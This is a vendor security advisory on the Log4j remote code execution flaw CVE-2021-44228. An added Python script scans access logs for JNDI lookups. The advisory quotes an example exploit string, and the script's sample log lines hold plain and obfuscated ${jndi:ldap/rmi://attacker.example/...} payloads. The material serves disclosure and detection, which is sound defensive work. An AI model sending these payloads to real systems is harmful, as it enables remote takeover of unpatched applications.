December 13, 2021
Micro Focus is continuing to analyze the remote code execution vulnerability (CVE-2021-44228) identified in Apache Log4j 2, the open-source logging library used in many Java-based applications. As we, along with many others in the industry, continue to identify and understand the full impact of this vulnerability, we will make that information available to our customers, together with mitigation guidance for affected products until a patch or release is available.
Micro Focus’ Security teams have been actively investigating this issue since the disclosure, first to assess the scope of the vulnerability across our portfolio and software versions and then to devise a suitable mitigation plan for each product and version determined to be affected. We have the indicators of compromise and are working with the Cybersecurity and Infrastructure Security Agency (CISA) to stay current with changes to this situation. We have had no alerts of possible Log4j intrusions.
Micro Focus is following guidance from the Cybersecurity and Infrastructure Security Agency (CISA) and National Cyber Security Centre (NCSC) on this issue. Micro Focus implements a Secure Development Lifecycle that includes Supply Chain Security, 3rd Party Component Manifest, and 3rd Party Component Monitoring.
Impact to CyberRes products and remediation details
The vulnerability is a remote code execution flaw that can allow an unauthenticated attacker to gain complete control of a target system. It is triggered when a specially crafted string is logged and processed by a vulnerable Log4j 2 component: the string uses Log4j's lookup syntax (for example ${jndi:ldap://attacker-host/...}) to make the logging library fetch and execute code from a remote server. Any user-provided input that reaches a log statement is a potential trigger.
Successful exploitation allows arbitrary code execution in the targeted application. Attackers do not need prior access to the system: any remote request that the application logs, for example a request sent with curl that carries the crafted string in a header or parameter, is enough. When Log4j formats the log message it evaluates the embedded lookup; in the attacks seen to date this loads code from the attacker's domain, granting full access to and control of the affected application.
Because logging code in applications and services is designed to record a wide variety of external input arriving from upper layers and through many possible vectors, the hardest part of assessing exposure is determining whether an application has a viable path by which the crafted exploit string can reach the vulnerable Log4j 2 code and trigger the attack.
A common exploitation pattern is a web application that logs usernames or the Referer or User-Agent request headers, all of which are externally supplied (for example, a web app built with Apache Struts). An attacker sends a crafted username or sets the User-Agent header to the exploit string, hoping that this input will at some point be processed by the vulnerable Log4j 2 code and trigger code execution.
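As an added example (not part of the Micro Focus advisory), the following Python script shows what the pattern described above looks like from the defender's side: it scans constructed web-server access-log lines in the common "combined" format, resolves the nested lookups (lower:, upper: and the :-default syntax) that attackers use to hide the jndi: prefix, and flags the username, request, Referer and User-Agent fields that carry a JNDI lookup. The log lines, host names and addresses are constructed for illustration; the resolution rule assumes that the variable in a ${name:-default} expression does not resolve on the target, so Log4j substitutes the default text.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Apache/nginx "combined" access-log format. The fields an attacker controls
# are user (HTTP auth), request, referer and agent.
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# An innermost ${...} lookup: a body containing no further "${" or "}".
INNER = re.compile(r"\$\{([^${}]*)\}")

# What we look for once obfuscation is stripped. Log4j lowercases the lookup
# prefix before matching it, so the check is case-insensitive.
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve_inner(m: "re.Match[str]") -> str:
    body = m.group(1)
    prefix, sep, rest = body.partition(":")
    prefix = prefix.lower()
    if sep and prefix == "lower":      # ${lower:J} -> j
        return rest.lower()
    if sep and prefix == "upper":      # ${upper:n} -> N
        return rest.upper()
    if ":-" in body:
        # ${name:-default}. Assumption: 'name' ("" in ${::-j}, an absent env
        # var in ${env:NaN:-j}) resolves to nothing, so the default is used.
        return body.split(":-", 1)[1]
    return m.group(0)                  # jndi:, sys:, ... are left untouched


def normalize(text: str, max_rounds: int = 16) -> str:
    """Resolve innermost lookups repeatedly until nothing changes."""
    for _ in range(max_rounds):
        resolved = INNER.sub(_resolve_inner, text)
        if resolved == text:
            break
        text = resolved
    return text


@dataclass
class Finding:
    line_no: int
    field: str
    raw: str
    normalized: str


def scan_access_log(lines: List[str]) -> List[Finding]:
    """Return one Finding per attacker-controlled field that carries a JNDI lookup."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        # Unparseable lines are scanned whole so nothing is silently skipped.
        fields: Dict[str, str] = m.groupdict() if m else {"line": line}
        for field in ("user", "request", "referer", "agent", "line"):
            raw = fields.get(field)
            if raw is None:
                continue
            norm = normalize(raw)
            if JNDI.search(norm):
                findings.append(Finding(n, field, raw, norm))
    return findings


# Constructed sample lines: hosts, addresses and timestamps are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:13:22:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [10/Dec/2021:13:22:09 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:13:22:15 +0000] "GET / HTTP/1.1" 404 0 "${${lower:j}${upper:n}di:rmi://attacker.example/x}" "curl/7.79.1"',
    '203.0.113.11 - ${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/o} [10/Dec/2021:13:22:20 +0000] "POST /api/auth HTTP/1.1" 401 0 "-" "python-requests/2.26"',
    '203.0.113.13 - - [10/Dec/2021:13:22:31 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.field} -> {f.normalized}   (raw: {f.raw})")
```

The last sample line contains the word jndi in a URL path but no lookup and is not reported; the three hits are the User-Agent on line 2, the Referer on line 3 and the username on line 4, the last two only visible after the nested lookups are resolved. Alerting on the normalized string rather than the literal text is what keeps simple obfuscation from slipping past the check.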
CyberRes client recommendations
- Apply the latest security updates to remediate this vulnerability. Please review the Apache CVE and the Apache security advisory for further details: https://logging.apache.org/log4j/2.x/security.html and https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
- Monitor Micro Focus Security bulletins
- Monitor for patches from the vendors of other affected software in your environment and apply them as they become available
CyberRes SaaS Update
CyberRes is aware of the recently disclosed security issue related to the open-source Apache "Log4j2" utility (CVE-2021-44228). We are actively monitoring for this issue and have implemented additional protective and detective controls in all CyberRes SaaS environments.
CyberRes On-Premise Update
Get the latest product info here: